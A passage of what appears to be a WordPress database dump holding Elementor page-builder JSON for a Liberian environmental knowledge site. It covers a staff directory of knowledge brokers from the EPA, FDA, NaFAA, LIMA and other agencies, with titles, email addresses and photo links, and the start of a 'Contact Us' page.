\\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony A. Yokie<\\/strong><br \\/>Manager<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23949,108,'_last_editor_used_jetpack','block-editor'),(23957,3509,'_elementor_edit_mode','builder'),(23958,3509,'_elementor_template_type','wp-page'),(23959,3509,'_elementor_version','3.0.16'),(23960,3509,'_wp_page_template','default'),(23961,3509,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form 